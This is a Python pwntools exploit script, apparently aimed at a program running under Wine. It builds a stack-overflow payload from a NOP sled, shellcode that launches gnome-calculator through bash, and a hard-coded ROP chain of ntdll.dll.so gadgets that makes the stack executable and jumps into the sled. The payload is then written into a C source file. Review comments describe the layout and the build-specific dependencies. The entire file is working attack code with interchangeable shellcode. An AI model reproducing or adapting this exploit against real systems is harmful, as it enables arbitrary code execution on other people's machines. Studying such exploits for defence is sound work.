from pwn import *
# Any linux/windows x86 shellcode will work great as long as there is no \x00 or \x0a.
# This shellcode opens gnome-calculator.
# NOTE(review): the \x00/\x0a restriction comes from how the payload is delivered —
# it is spliced verbatim into a C asm("...") string literal at the bottom of this
# file, where a NUL or newline would cut the literal short before the overflowing
# bytes are reached. The trailing \xcd\x80 (int 0x80) traps are 32-bit Linux
# syscall entries, so despite the "linux/windows" remark this particular blob is
# only meaningful on a Linux host (i.e. a Wine-hosted target) — TODO confirm.
shellcode = b'\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x61\x74\x6f\x72\x68\x6c\x63\x75\x6c\x68\x65\x2d\x63\x61\x68\x67\x6e\x6f\x6d\x68\x3d\x3a\x30\x20\x68\x50\x4c\x41\x59\x66\x68\x49\x53\x83\xec\x01\xc6\x04\x24\x44\x89\xe6\x83\xec\x01\x88\x04\x24\x66\x68\x2d\x63\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x75\x73\x72\x2f\x83\xec\x01\xc6\x04\x24\x2f\x50\x56\x83\xee\x03\x56\x83\xee\x0e\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80'
def gen_payload():
    """Build the raw stack-overflow payload: NOP sled, shellcode, a pointer fixup, a ROP chain, filler.

    Layout, in order (every offset and address below is hard-coded for one specific
    Wine build; the comments on each line say what each value is for):
      * 1024 bytes of NOP sled whose tail is the module-level ``shellcode``;
      * one pointer that lands in a clobbered local so the vulnerable function
        survives until its ``ret``;
      * 434 + 32 bytes of filler up to the saved return address (inferred from the
        layout, not verified here);
      * a ROP chain made only of ntdll.dll.so gadgets that makes the stack executable
        and then jumps back into the sled;
      * trailing ``b'A'`` filler.

    Returns:
        bytes: the payload. The caller embeds it inside a C ``asm("...")`` string
        literal, so it must contain neither ``\\x00`` nor ``\\x0a``; the ROP chain
        below exists partly to encode a stack address whose top byte is ``\\x00``.

    NOTE(review): from a defensive standpoint the chain depends on two properties of
    the hosting Wine build — a fixed load address for ntdll.dll.so (no ASLR for it)
    and the ability to flip the stack executable via VIRTUAL_SetForceExec. Randomised
    module bases or a stack that cannot be made executable would break the chain at
    its first gadget. The vulnerable target itself is not identified on this page.
    """
    payload_len = 2052  # target size; see the filler computation on the last line
    # NOP sled so the final jump only has to land somewhere in the first 1024 bytes.
    p = b'\x90' * (1024 - len(shellcode))
    p += shellcode # Somewhere after 0x6df738 on stack
    # We have to give an overwritten local variable some writeable memory so we don't
    # crash before ret. Thankfully ntdll.dll.so is loaded in at a constant address
    p += p32(0x7be94004) # ntdll.dll.so .data + 4
    # Filler up to the saved return address (presumably; offsets are build-specific).
    p += b'B' * 434
    p += b'C' * 32
    # Rop first to disable DEP, then jump to shellcode on stack. All gadgets are in
    # ntdll.dll.so which makes it easy to adapt the exploit to other wine versions due to
    # lack of aslr. ROP is necessary to encode the stack address that contains \x00
    p += p32(0x7bcce33e) # call VIRTUAL_SetForceExec to make the stack executable
    # The two popped constants XOR to 0x006df738 (the stack address named in the
    # comment above); it cannot appear literally because its top byte is \x00.
    p += p32(0x7bcbb001) # pop edi; pop ebp; ret
    p += p32(0x1259a140)  # -> edi
    p += p32(0x12345678)  # -> ebp
    p += p32(0x7bc88bc5) # xchg eax, edi; ret      eax = 0x1259a140
    p += p32(0x7bc57c92) # xor ebp, eax ; ret      ebp = 0x12345678 ^ 0x1259a140 = 0x006df738
    p += p32(0x7bc55b8a) # xchg eax, ebp; ret      eax = 0x006df738
    p += p32(0x7bc4a781) # push eax ; ret          "jmp eax" into the sled on the stack
    # NOTE(review): this pads with four times the byte shortfall to payload_len, not
    # the shortfall itself; looks deliberate but the reason is not on this page — confirm.
    p += b'A' * (4 * (payload_len - len(p)))
    return p
# Wrap the raw payload in a minimal C translation unit: the bytes become the body of
# an inline asm("...") string literal (hence the no-\x00/no-\x0a rule on the payload),
# and the result is written to src/main.c for the target to consume.
payload = b''.join((
    b'int main() {\nasm("',
    gen_payload(),
    b'");\n',
    b'return 0;\n}',
))
with open('src/main.c', 'wb') as f:
    f.write(payload)